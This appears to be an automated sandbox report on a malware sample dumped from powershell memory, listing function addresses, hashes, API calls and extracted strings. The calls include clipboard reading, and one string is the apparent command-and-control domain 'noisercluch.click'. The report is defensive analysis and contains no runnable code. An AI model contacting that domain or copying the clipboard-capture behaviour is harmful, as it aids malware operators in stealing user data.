Snapshot File: hcaresult_8_2_400000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 974f5bf9f7c2ad883ab0c40ffd062568f537604b809183c9cd25748ea347c1ad
Instruction ID: b6b48b49e2ce04e457aa333140cde9ad5d46efccf9dfc3f9defd0387b571751f
Opcode Fuzzy Hash: 974f5bf9f7c2ad883ab0c40ffd062568f537604b809183c9cd25748ea347c1ad
Instruction Fuzzy Hash: 335104B29042158BC7108F24DC627AB73A0FF9A368F08453AFD95873A1E7389C41C75A

Function 0043EEC0 Relevance: .1, Instructions: 141COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.4456127853.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.4456127853.0000000000451000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_powershell.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 1fb60d2ab0036475f1a21ac8661de25c02472134cab741590145f16cccbdafbd
Instruction ID: 043cc890cb6b2b30803d39af6b3c454268537f3fae5b00cf446519d023dfd00f
Opcode Fuzzy Hash: 1fb60d2ab0036475f1a21ac8661de25c02472134cab741590145f16cccbdafbd
Instruction Fuzzy Hash: E7413975605304AFE3288F29DCC1B7BB3A6EB8D718F24552DE1C697291CAB4BC11C649

Function 0042F37A Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 169
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SysAllocString.OLEAUT32 ref: 0042F42A

Strings

0, xrefs: 0042F6C0

Memory Dump Source

Source File: 00000008.00000002.4456127853.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.4456127853.0000000000451000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_powershell.jbxd

Similarity

API ID: AllocString
String ID: 0
API String ID: 2525500382-4108050209
Opcode ID: 8da7bf490a034171e3dce45de74038d4641a0d6d0dca22c35aceb32db23d8fd3
Instruction ID: a1bca001c7a4cafc18474ec3c09c662e33e11ff26cf3423f3d2483c3ce0ae8c6
Opcode Fuzzy Hash: 8da7bf490a034171e3dce45de74038d4641a0d6d0dca22c35aceb32db23d8fd3
Instruction Fuzzy Hash: F1A1AE70108FC28AD332C63C88587D7BFD15BA7324F484BADD0FA4A3E6D6A52146C766

Function 0043165C Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 164
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SysAllocString.OLEAUT32 ref: 004316F5

Strings

0, xrefs: 00431870

Memory Dump Source

Source File: 00000008.00000002.4456127853.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.4456127853.0000000000451000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_powershell.jbxd

Similarity

API ID: AllocString
String ID: 0
API String ID: 2525500382-4108050209
Opcode ID: 25ab0af81ca39a2f35250ae81ccfa8cb2cc541f9024661974fe6062f9beea9ae
Instruction ID: 0bc001b784ff9219c14a20724f0671f28d23ae2ac33e4cc183003bbe73fc1bcb
Opcode Fuzzy Hash: 25ab0af81ca39a2f35250ae81ccfa8cb2cc541f9024661974fe6062f9beea9ae
Instruction Fuzzy Hash: 38812460108BC1CED366CB3C8888A067F922B6B224F1E87D9D1E94F7F3C665D506C766

Function 0042F787 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 122
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SysFreeString.OLEAUT32 ref: 0042F793

Strings

0, xrefs: 0042F924

Memory Dump Source

Source File: 00000008.00000002.4456127853.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.4456127853.0000000000451000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_powershell.jbxd

Similarity

API ID: FreeString
String ID: 0
API String ID: 3341692771-4108050209
Opcode ID: 380e84ca371044cea28e8452650673017fa369a6050c559cfbf2dc47d4d33812
Instruction ID: bde3fda008fae2ddbf337259ae56ab0a534ac6309ad685f2f7a7d6aa015b5799
Opcode Fuzzy Hash: 380e84ca371044cea28e8452650673017fa369a6050c559cfbf2dc47d4d33812
Instruction Fuzzy Hash: B1718850108FC1C9D372CB3C8548607BFE16B67224F484B9DD1E64BBE6D3AAB509C76A

Function 00435BDB Relevance: 1.5, APIs: 1, Instructions: 41COMMON

Download Yara Rule

APIs

GetUserDefaultUILanguage.KERNELBASE ref: 00435C00

Memory Dump Source

Source File: 00000008.00000002.4456127853.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.4456127853.0000000000451000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_powershell.jbxd

Similarity

API ID: DefaultLanguageUser
String ID:
API String ID: 95929093-0
Opcode ID: 1f3a4874fe6a934c83db0129cb2c4f35d243ae89896cc335940cfab8c0206f25
Instruction ID: d529aa2c6436962cd02f9ff259ed32c9c8aa20a75f7e6bd79d554a5377992a07
Opcode Fuzzy Hash: 1f3a4874fe6a934c83db0129cb2c4f35d243ae89896cc335940cfab8c0206f25
Instruction Fuzzy Hash: 4801D2358043A58FCF118F7898442EE7FA16F1A314F18469DC8D567396D739AA01CB96

Function 0043BA70 Relevance: 1.5, APIs: 1, Instructions: 30memoryCOMMON

Download Yara Rule

APIs

RtlReAllocateHeap.NTDLL(?,00000000,004377BF,00000000,00004000,00000000,004377BF,00000000,00004000), ref: 0043BAA2

Memory Dump Source

Source File: 00000008.00000002.4456127853.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.4456127853.0000000000451000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_powershell.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: f12a0d30cc2367c78ba08f1fd21fcf34805736e507490131006d9ced82152e8a
Instruction ID: be575660327ce48efbff70f1a81ba6d67653373a4ecd42db05ccb867a55137c7
Opcode Fuzzy Hash: f12a0d30cc2367c78ba08f1fd21fcf34805736e507490131006d9ced82152e8a
Instruction Fuzzy Hash: CBE02B36418311BBC2152F347D05B173A78DFCA734F050836F40192111DB38E81281EF

Function 0042FB06 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

CoSetProxyBlanket.COMBASE ref: 0042FB4C

Memory Dump Source

Source File: 00000008.00000002.4456127853.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.4456127853.0000000000451000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_powershell.jbxd

Similarity

API ID: BlanketProxy
String ID:
API String ID: 3890896728-0
Opcode ID: 0f3a594d24f492ad421ea8460d4e17b4e5aba94734245f3cc342df4c7054f90f
Instruction ID: 4e2864844023ea26aa9e2ee02480731ef327d8f3645c39fc8e2c289bfba3a2ea
Opcode Fuzzy Hash: 0f3a594d24f492ad421ea8460d4e17b4e5aba94734245f3cc342df4c7054f90f
Instruction Fuzzy Hash: CCF070B4509701CFE314DF28D5A8B1ABBF0FB89304F11891CE4958B3A1CB75A549CF82

Function 00430779 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

CoSetProxyBlanket.COMBASE ref: 004307C3

Memory Dump Source

Source File: 00000008.00000002.4456127853.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.4456127853.0000000000451000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_powershell.jbxd

Similarity

API ID: BlanketProxy
String ID:
API String ID: 3890896728-0
Opcode ID: d0d004b74e83634fe9f7cd80248a028dc92d7887ef778d010a08205c6b6403e5
Instruction ID: f402ad757b55e4d436691d2150176b8ee0a7d87fd75628386497c25852c9749b
Opcode Fuzzy Hash: d0d004b74e83634fe9f7cd80248a028dc92d7887ef778d010a08205c6b6403e5
Instruction Fuzzy Hash: 69F017B55483028FE301CF24C55835BBBE1BBC5308F15892CE0A44B354C7B5A5498FC2

Function 0043BC91 Relevance: 1.5, APIs: 1, Instructions: 20COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32 ref: 0043BCA2

Memory Dump Source

Source File: 00000008.00000002.4456127853.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.4456127853.0000000000451000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_powershell.jbxd

Similarity

API ID: ForegroundWindow
String ID:
API String ID: 2020703349-0
Opcode ID: de7ba2978205d3e5dac454b169e1469a028ee3eec04f5a814a46a1d3adc94483
Instruction ID: 34fc1b220f50a438f75fecb060dcf8b9689bf8e5ef46e1e0de830b6ef63ced86
Opcode Fuzzy Hash: de7ba2978205d3e5dac454b169e1469a028ee3eec04f5a814a46a1d3adc94483
Instruction Fuzzy Hash: DBE04FB9E019459FCB48CF29FC504B977A2E759314704547DE503C7761DB389906CB08

Function 00408A5A Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

ExitProcess.KERNEL32 ref: 00408A17

Part of subcall function 0040C900: CoInitializeEx.COMBASE(00000000,00000002), ref: 0040C913

Memory Dump Source

Source File: 00000008.00000002.4456127853.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.4456127853.0000000000451000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_powershell.jbxd

Similarity

API ID: ExitInitializeProcess
String ID:
API String ID: 2609639641-0
Opcode ID: 7e272d4335b3e3e84faac5d9e394e9080025601360d9e560db1138612ec4a6e8
Instruction ID: 82d6606fa36e3cbb062f3f62f4115757301a9ad13968e3cd0d8a51896aa86cf4
Opcode Fuzzy Hash: 7e272d4335b3e3e84faac5d9e394e9080025601360d9e560db1138612ec4a6e8
Instruction Fuzzy Hash: 3FE086F494430587CB407B726D0236A32946F00359B14407FF445B91D3DF7EA842D55F

Function 0040C900 Relevance: 1.5, APIs: 1, Instructions: 18COMMON

Download Yara Rule

APIs

CoInitializeEx.COMBASE(00000000,00000002), ref: 0040C913

Memory Dump Source

Source File: 00000008.00000002.4456127853.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.4456127853.0000000000451000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_powershell.jbxd

Similarity

API ID: Initialize
String ID:
API String ID: 2538663250-0
Opcode ID: 848936b2f6a1009ae71585b31087a1977fcf0e71369a6819067518d21a73774f
Instruction ID: 600c1c55f4c47978a808d38d6d603c7baf665e00bbb4b934b296b6fd480c4591
Opcode Fuzzy Hash: 848936b2f6a1009ae71585b31087a1977fcf0e71369a6819067518d21a73774f
Instruction Fuzzy Hash: D5D02E21A140842BC608AB2CDC06F2736A8C703B92F000238A293C62D2E8007A00C169

Function 0040C935 Relevance: 1.5, APIs: 1, Instructions: 17COMMON

Download Yara Rule

APIs

CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 0040C947

Memory Dump Source

Source File: 00000008.00000002.4456127853.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.4456127853.0000000000451000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_powershell.jbxd

Similarity

API ID: InitializeSecurity
String ID:
API String ID: 640775948-0
Opcode ID: 921506b26635a132b4df4f2ddd7b465313c55da5b78467d40561622a9134298f
Instruction ID: fd192ded0c0cb464a206ce1d3467658bba8c5c20ae5ff3727e68ffbe475560a4
Opcode Fuzzy Hash: 921506b26635a132b4df4f2ddd7b465313c55da5b78467d40561622a9134298f
Instruction Fuzzy Hash: 8AD0C9787D83807AF1648B18EC17F203210AB02F66F340228B363FE2E2CAD07201860C

Function 0043A0A0 Relevance: 1.5, APIs: 1, Instructions: 15memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(?,00000000,00000000,00413147), ref: 0043A0C0

Memory Dump Source

Source File: 00000008.00000002.4456127853.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.4456127853.0000000000451000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_powershell.jbxd

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 7e4a886f44f579dff80980d892cb73d2b56cb90909c1320e76daed750195b038
Instruction ID: 91785600a9bb6ba1e718d507953919cb8ba152ebb43f2213e550c9c7e00cfb49
Opcode Fuzzy Hash: 7e4a886f44f579dff80980d892cb73d2b56cb90909c1320e76daed750195b038
Instruction Fuzzy Hash: E6D0C931459222EBC6642F28BC05BCB3A68DF49721F0748A1B8046A075CB25DC92DAD8

Function 0043A080 Relevance: 1.5, APIs: 1, Instructions: 9memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(?,00000000,?,7B1647F3,004088F3,10130D9D), ref: 0043A090

Memory Dump Source

Source File: 00000008.00000002.4456127853.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.4456127853.0000000000451000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_powershell.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: a826fa1a808b86476f320bed956aa5f891f97a687e97340bd9f451430216ea59
Instruction ID: 837ad169f02d3a6e148c43055f209d62a0c8dee17724750e6d7a36a8bc783edc
Opcode Fuzzy Hash: a826fa1a808b86476f320bed956aa5f891f97a687e97340bd9f451430216ea59
Instruction Fuzzy Hash: 2DC09B31445121ABC7142B15FC09FCA3F68EF45755F154095F00467071CB70AC92C6D9

Non-executed Functions

Function 00431D10 Relevance: 40.4, APIs: 2, Strings: 21, Instructions: 163COMMON

Download Yara Rule

APIs

GetSystemMetrics.USER32 ref: 00431D59
GetSystemMetrics.USER32 ref: 00431D69

Strings

O$C, xrefs: 00431F35
i*C, xrefs: 00431F77
O$C, xrefs: 00432006
O$C, xrefs: 00431F56
O$C, xrefs: 00431FB9
O$C, xrefs: 00431FE5
O$C, xrefs: 00431FFB
5"C, xrefs: 00431FCF
O$C, xrefs: 00431FAE
O$C, xrefs: 00431F14
, xrefs: 00431E56
O$C, xrefs: 00431F40
O$C, xrefs: 00431EF3
($C, xrefs: 00431EC7
O$C, xrefs: 00431F98
O$C, xrefs: 00431F61
O$C, xrefs: 00431F09
O$C, xrefs: 00431EE8
O$C, xrefs: 00431FDA
O$C, xrefs: 00431F8D
_(C, xrefs: 00431FC4

Memory Dump Source

Source File: 00000008.00000002.4456127853.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.4456127853.0000000000451000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_powershell.jbxd

Similarity

API ID: MetricsSystem
String ID: $($C$5"C$O$C$O$C$O$C$O$C$O$C$O$C$O$C$O$C$O$C$O$C$O$C$O$C$O$C$O$C$O$C$O$C$_(C$i*C
API String ID: 4116985748-3372999186
Opcode ID: 8e9cdeb4bfab84274a9669cd475aa5743967b19e075009f034f97172db1c8e9c
Instruction ID: 8d029f29b9a4e16f053ed14b1b3047fa4adeb45d898568eba0a28193ac899bff
Opcode Fuzzy Hash: 8e9cdeb4bfab84274a9669cd475aa5743967b19e075009f034f97172db1c8e9c
Instruction Fuzzy Hash: EEA16BB041C7818BE770DF18C448B9BBBE0BBC6308F51892ED5989B651C7B99848CF87

Function 00423FF1 Relevance: 14.9, Strings: 11, Instructions: 1151COMMON

Download Yara Rule

Strings

XY, xrefs: 00424FE1
~x, xrefs: 004247DC
`.`,, xrefs: 00424881
Um, xrefs: 004247F2
}{, xrefs: 004247D1
|*z(, xrefs: 0042488C
RQ, xrefs: 00424423
~C, xrefs: 004247E7
GZ, xrefs: 0042442E
^_, xrefs: 00424223
?2, xrefs: 00424418

Memory Dump Source

Source File: 00000008.00000002.4456127853.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.4456127853.0000000000451000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_powershell.jbxd

Similarity

API ID:
String ID: ?2$GZ$RQ$Um$XY$^_$`.`,$|*z($}{$~C$~x
API String ID: 0-3286641888
Opcode ID: abf1a2d51877641f5562f281eb5d011c9569786f6aa3996313bf72f662093cb3
Instruction ID: 8905dcfdf89283d7057ea18a46458f0f65d17b19ac1614b2b51523b123e5834b
Opcode Fuzzy Hash: abf1a2d51877641f5562f281eb5d011c9569786f6aa3996313bf72f662093cb3
Instruction Fuzzy Hash: 13A284B560C7918BC334CF24E8417AFBBF1FB95300F50892DE5D99B252E77499068B8A

Function 004226D3 Relevance: 9.5, Strings: 7, Instructions: 769COMMON

Download Yara Rule

Strings

1{, xrefs: 00422A0E
?<, xrefs: 00422AB6
20B, xrefs: 00423026
zw, xrefs: 00422A06
r~, xrefs: 00422A16
0, xrefs: 00422888
noisercluch.click, xrefs: 00422AEF

Memory Dump Source

Source File: 00000008.00000002.4456127853.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.4456127853.0000000000451000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_powershell.jbxd

Similarity

API ID:
String ID: 0$1{$20B$?<$noisercluch.click$r~$zw
API String ID: 0-4196919862
Opcode ID: fb6ee96e0be21326e94525104abc78ae555f1cb0e8431931a54a63ac0b47341b
Instruction ID: d33c3c22aecb478376be31245472bd180fa71e6bbe94e4be3b838edfdb885b08
Opcode Fuzzy Hash: fb6ee96e0be21326e94525104abc78ae555f1cb0e8431931a54a63ac0b47341b
Instruction Fuzzy Hash: 004213756083519FD328CF24E89176BBBE1FBC6300F58896CE8D54B391DB789901CB86

Function 00431B10 Relevance: 9.2, APIs: 6, Instructions: 152clipboardCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 00431B24
GetClipboardData.USER32 ref: 00431B3F
GlobalLock.KERNEL32 ref: 00431B58
GetWindowLongW.USER32 ref: 00431BC7
GlobalUnlock.KERNEL32 ref: 00431CE7
CloseClipboard.USER32 ref: 00431CF4

Memory Dump Source

Source File: 00000008.00000002.4456127853.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.4456127853.0000000000451000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_powershell.jbxd

Similarity

API ID: Clipboard$Global$CloseDataLockLongOpenUnlockWindow
String ID:
API String ID: 2832541153-0
Opcode ID: 5502842d010c68d0be0a87ba9bd2940b424877ada9b18a2ce83abf0bf6e0d2fd
Instruction ID: 456b1e1cfcf1951664547b6acc2f3bc49ddc4e535775eb3306363a95376e0e20
Opcode Fuzzy Hash: 5502842d010c68d0be0a87ba9bd2940b424877ada9b18a2ce83abf0bf6e0d2fd
Instruction Fuzzy Hash: E151E5B264C7818FC3009FBC888525EBAD1ABC9324F185B3EE5E5873E1D6788545C35B

Function 00418095 Relevance: 7.6, Strings: 5, Instructions: 1319COMMON

Download Yara Rule

Strings

K, xrefs: 00418162
(, xrefs: 004182E1
Q230, xrefs: 00418B93
d, xrefs: 00418726
', xrefs: 00419102

Memory Dump Source

Source File: 00000008.00000002.4456127853.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.4456127853.0000000000451000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_powershell.jbxd

Similarity

API ID:
String ID: '$K$Q230$d$(
API String ID: 0-937174541
Opcode ID: 96b88a0bc1e9c7f4c3f8bbeb35a0a556ceff7617056c4195f8ea9ca94eec2832
Instruction ID: 58f53d59709b9d842a8a43f359275e23c79d1d1439031bf9fc017cbfd7306527
Opcode Fuzzy Hash: 96b88a0bc1e9c7f4c3f8bbeb35a0a556ceff7617056c4195f8ea9ca94eec2832
Instruction Fuzzy Hash: 469278716083418BD724CF28C8917ABBBE2FFD6354F18896EE4C58B391EB388945C756

Function 004259B0 Relevance: 5.4, Strings: 4, Instructions: 408COMMON

Download Yara Rule

Strings

Y\, xrefs: 00425A5F
/V, xrefs: 00425A57
!J, xrefs: 00425A67
U+, xrefs: 00425A4F

Memory Dump Source

Source File: 00000008.00000002.4456127853.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.4456127853.0000000000451000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_powershell.jbxd

Similarity

API ID:
String ID: !J$/V$U+$Y\
API String ID: 0-2652480667
Opcode ID: 6245c86af1fa167c098d8d9fd2067241db41687ff5bee92dd6a8e87abd358cc4
Instruction ID: e638dceca7007414c1790a2a48e061f39edb8c9276ca3b8e5075e95b8c8bbe4b
Opcode Fuzzy Hash: 6245c86af1fa167c098d8d9fd2067241db41687ff5bee92dd6a8e87abd358cc4
Instruction Fuzzy Hash: 59E123B5608300DFE724DF25E88176BB7F1FB96304F84892DE1D54B262DB349815CB56

Function 0042C894 Relevance: 5.3, Strings: 4, Instructions: 308COMMON

Download Yara Rule

Strings

d, xrefs: 0042CACA
^TFW, xrefs: 0042CC43
@, xrefs: 0042CBB3
0, xrefs: 0042CB61

Memory Dump Source

Source File: 00000008.00000002.4456127853.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.4456127853.0000000000451000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_powershell.jbxd

Similarity

API ID:
String ID: 0$@$^TFW$d
API String ID: 0-3517422908
Opcode ID: 37f25ea6869bded6d623e990895bc7805b0ee94feffc2b6719acab69f49713cd
Instruction ID: 5bd2b57a04c6c6cac2f535ba146a6f82be99d0a7104f65c521330fa3aa0df0c5
Opcode Fuzzy Hash: 37f25ea6869bded6d623e990895bc7805b0ee94feffc2b6719acab69f49713cd
Instruction Fuzzy Hash: DE712B7020C3A14BD318CF3A94A133FBFD1AFD6304FA8896EE4D68B391D6788545875A

Function 0043A800 Relevance: 4.4, Strings: 3, Instructions: 638COMMON

Download Yara Rule

Strings

<Y?., xrefs: 0043ABDB
@Y?., xrefs: 0043AC15
f, xrefs: 0043AA31

Memory Dump Source

Source File: 00000008.00000002.4456127853.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.4456127853.0000000000451000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_powershell.jbxd

Similarity

API ID: InitializeThunk
String ID: <Y?.$@Y?.$f
API String ID: 2994545307-3750340189
Opcode ID: f5d0ab0165fd72296afb49a4082ff4d1d69aa16d0b7bf5cdeb91bdb842df25fc
Instruction ID: c74426cb7d5c2b8464f7a726c278729e67e47e3ee492349ccfb6cdb994678fcd
Opcode Fuzzy Hash: f5d0ab0165fd72296afb49a4082ff4d1d69aa16d0b7bf5cdeb91bdb842df25fc
Instruction Fuzzy Hash: 2E2200716483418FD314CF28C890B2BFBE2BB89314F189A2DE5D597392D639EC158B5B

Function 0042C984 Relevance: 4.1, Strings: 3, Instructions: 301COMMON

Download Yara Rule

Strings

d, xrefs: 0042CACA
^TFW, xrefs: 0042CC43
@, xrefs: 0042CBB3

Memory Dump Source

Source File: 00000008.00000002.4456127853.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.4456127853.0000000000451000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_powershell.jbxd

Similarity

API ID:
String ID: @$^TFW$d
API String ID: 0-3772873652
Opcode ID: e77948e8393a9cc7bdcb460bf7634ff0d9ab7fe049b435dd13a9d95e45e3b21a
Instruction ID: 2799912a11167947c30dacb984bff5d50de61b2a63b57257e2670e2a4959d2e1
Opcode Fuzzy Hash: e77948e8393a9cc7bdcb460bf7634ff0d9ab7fe049b435dd13a9d95e45e3b21a
Instruction Fuzzy Hash: 66711A7020C3A14BD318CF3A94A133FBFD19FD6344FA8896EE4D68B391D67885458B5A

Function 0042C9E9 Relevance: 4.0, Strings: 3, Instructions: 300COMMON

Download Yara Rule

Strings

d, xrefs: 0042CACA
^TFW, xrefs: 0042CC43
@, xrefs: 0042CBB3

Memory Dump Source

Source File: 00000008.00000002.4456127853.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.4456127853.0000000000451000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_powershell.jbxd

Similarity

API ID:
String ID: @$^TFW$d
API String ID: 0-3772873652
Opcode ID: 428764b825e4b8ba2b7fca742bfc1c8c513ef9c8b7cb12bd82b87945db3e714d
Instruction ID: 458834963df5767a90244649d61e24c3552d5e0eb6c30586b80692c9ea77be3c
Opcode Fuzzy Hash: 428764b825e4b8ba2b7fca742bfc1c8c513ef9c8b7cb12bd82b87945db3e714d
Instruction Fuzzy Hash: 0071197020C3914BD318CF3A94A133FBFD19FD6344FA8896EE4D68B391D67885458B5A

Function 0042C9DA Relevance: 4.0, Strings: 3, Instructions: 274COMMON

Download Yara Rule

Strings

d, xrefs: 0042CACA
^TFW, xrefs: 0042CC43
@, xrefs: 0042CBB3

Memory Dump Source

Source File: 00000008.00000002.4456127853.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.4456127853.0000000000451000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_powershell.jbxd

Similarity

API ID:
String ID: @$^TFW$d
API String ID: 0-3772873652
Opcode ID: 3f31c8060202d205d8d56ef81dab902602b2f34c72238eee859b47f9e4bd7e14
Instruction ID: 7127210c2118b4699990a0b47df2bedd54d271212ffcb081a94f2e7bc78a3b0a
Opcode Fuzzy Hash: 3f31c8060202d205d8d56ef81dab902602b2f34c72238eee859b47f9e4bd7e14
Instruction Fuzzy Hash: A1613C6020C3914BD318CF3A94A133BFFD19FE7344F98896EE4D68B391D67885068B5A

Function 0041720B Relevance: 3.4, Strings: 2, Instructions: 890COMMON

Download Yara Rule

Strings

1, xrefs: 00417631
!, xrefs: 004178E5

Memory Dump Source

Source File: 00000008.00000002.4456127853.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.4456127853.0000000000451000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_powershell.jbxd

Similarity

API ID: InitializeThunk
String ID: !$1
API String ID: 2994545307-1727534169
Opcode ID: 2a0b0e61a0fd46e687afd3fb80dceb4b2a217cab351d90bd5ba14a3ec35806dd
Instruction ID: 18e54f202c1cd8f8496f1e16bfd62ccc5ce9293f6dd7f49c90947e8211889b76
Opcode Fuzzy Hash: 2a0b0e61a0fd46e687afd3fb80dceb4b2a217cab351d90bd5ba14a3ec35806dd
Instruction Fuzzy Hash: 3222547460C3418FD7258F24D8917BBBBE2FB9A314F18497DD4C687262D7388846CB5A

Function 0041CC60 Relevance: 3.0, Strings: 2, Instructions: 493COMMON

Download Yara Rule

Strings

46i`, xrefs: 0041D104
06i`, xrefs: 0041D13A

Memory Dump Source

Source File: 00000008.00000002.4456127853.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.4456127853.0000000000451000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_powershell.jbxd

Similarity

API ID:
String ID: 06i`$46i`
API String ID: 0-253969996
Opcode ID: 950d7402485480fe5043ae326df5e941a9b7dffefcdfff4a21107514e64b3dfe
Instruction ID: f2447ed329897e406d807fa8b6de1cfbf394bef9ae46c609ed5e471a74be3ede
Opcode Fuzzy Hash: 950d7402485480fe5043ae326df5e941a9b7dffefcdfff4a21107514e64b3dfe
